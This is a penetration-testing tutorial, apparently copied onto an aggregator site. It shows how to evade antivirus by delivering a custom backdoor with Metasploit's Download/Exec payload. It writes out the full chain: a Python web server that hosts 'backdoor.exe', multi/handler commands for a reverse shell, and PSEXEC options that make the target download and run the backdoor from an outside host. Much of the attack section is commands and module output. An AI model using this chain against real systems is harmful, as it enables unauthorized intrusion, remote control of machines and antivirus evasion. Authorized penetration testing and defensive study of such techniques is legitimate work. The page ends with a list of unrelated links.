Metasploit - Custom Payloads
来源:互联网 发布:庄子思想 知乎 编辑:程序博客网 时间:2024/06/15 03:51
You launch your Metasploit exploit. It looks like it is working but no session is created. What happened? Your exploit just got popped by antivirus software. Such a bummer. Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys. The best way to avoid antivirus software is to stop using a payload that someone else created. Time and time again, penetration testers find they have a basic need to use custom payloads.
Createyour own custom payload, and then you won’t have to worry about an AV signature catching your payload and eating it! It is easy and it gives you the flexibility to go after any target. There are lots of tools and articles for helping you doing so, including the Veil framework.
So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it? There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.
Metasploit’s Download/Exec Payload is a great option for delivering a custom payload to a target. You can use it with most of Metasploit’s exploits including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC. This flexibility means with this Metasploit payload, you can use your custom payload with the Meterpreter.
To use the Download/Exec payload, you will need to do three things. First, you’ll need a website from which the victim can download your custom backdoor. Second, you will need to setup a Metasploit handler to receive the connection from your custom backdoor. Lastly, you’ll need an exploit to deliver your custom payload. Let’s take a look at each of the steps.
A website to provide the “Download” in the Download/Exec payload
You have lots of options for a website to deliver you payloads. Anytime I need a “quick and easy” website I use Python. The first step to staring the Python web server is to change to the directory that contains the files you want to make available for download. Then the command “python —m ‘SimpleHTTPServer’ ” can be used to start a web server. The files in that directory can then be downloaded using any web browser. You can setup this server on any computer that has Python installed. Here, I’ve started a web server listening on port 8000. When the exploit runs you’ll see the download being logged by your web server. Here you can see the victim 10.1.1.170 downloading a copy of “pythonbackdoor.exe”.
[nixawk@core ~]$ python -m 'SimpleHTTPServer' 8000Serving HTTP on 0.0.0.0 port 8000 ...
Start a handler to receive your shell
Starting the multi/handler requires a few simple commands. First is “use multi/handler”. Next, set your payload to one that is compatible with the custom payload you created. If your payload contains meterpreter then you will “set payload windows/meterpreter/reverse_tcp”. If it is a command prompt then you would type “set payload windows/shell/reverse_tcp”. Since my Python backdoor sends a command prompt, the correct payload here is “windows/shell/reverse_tcp”. This “single” payload doesn’t use a stager and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” is expecting a connection from a stager not a shell. Setting LPORT to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host. This is a good shortcut from single payloads but it is not a good idea to use this for staged payloads. Some stagers, for example /*/reverse_http, will require that you have an actual routed address so that the stager knows where to download the next stage. Finally, set your LPORT to the port your custom payload is hardcoded to connect to. In this example, my payload is set to send a command prompt to port 80. Finally, you’ll need to start the multi-handler but our work in Metasploit is still not finished. You’ll also need to start your multi-handler as a background task. To do this, the “-j” options to the exploit command will start the multi-handler as a “job” that runs in the background.
msf > use multi/handlermsf exploit(handler) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(handler) > set LHOST 0.0.0.0LHOST => 0.0.0.0msf exploit(handler) > set LPORT 80LPORT => 80msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST 0.0.0.0 yes The listen address LPORT 80 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Target
Exploit the target and deliver the payload
With your handler in the background waiting to receive a connection, you’re ready to exploit the target. Just about any exploit could be used, but remembering my Penetration Tester’s Pledge,I’ll use PSEXEC. First, I use “windows/smb/psexec” and set it up with the correct username and password for the target. Then I set my payload by typing “set PAYLOAD download/exec”. The options are pretty simple. You set the URL to point to the custom payload on the web server that you setup in step 1. You can change the name of the file that will be saved to the target if you like.
msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.100 yes The target address RPORT 445 yes Set the SMB service port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass testpass no The password for the specified username SMBUser testuser no The username to authenticate asPayload options (windows/download_exec): Name Current Setting Required Description ---- --------------- -------- ----------- EXE backdoor.exe yes Filename to save & run executable on target system EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) URL http://192.168.1.108:8000/backdoor.exe yes The pre-encoded URL to the executableExploit target: Id Name -- ---- 0 Automatic
When you type “exploit” you will see it download from your website and a shell will appear in your handler. Game On. Let the pivots begin.
References:
- custom payloads in metasploit
- Metasploit - Custom Payloads
- 创建Metasploit Payloads
- Metasploit功能程序------payloads、encoder、Nasm shell
- 如何手动将Metasploit的Payloads注入到Android应用中
- Metasploit
- Metasploit
- Metasploit
- sql注入payloads
- Solr 迟到的Payloads
- Git All the Payloads! A collection of web attack payloads. 20160416
- Metasploit使用说明
- HTTP METASPLOIT
- Metasploit Framework
- metasploit-unleashed
- Metasploit Support
- metasploit video
- metasploit vpn
- metasploit更新
- Go学习笔记:panic()和recover()
- andoid studio生成release版本的apk---app-release.apk
- fcntl使用
- 一致性 hash 算法( consistent hashing )
- Decode Ways
- Metasploit - Custom Payloads
- tomcat下webapp取得本地几个路径的代码片断
- 数据结构--平衡二叉树
- 【网络】协议森林
- ubuntu 源
- 一致性哈希算法(consistent hashing)
- POJ-3617-Best Cow Line(贪心算法+Java)
- 关押罪犯---并查集操作
- XMLHttpRequest对象的创建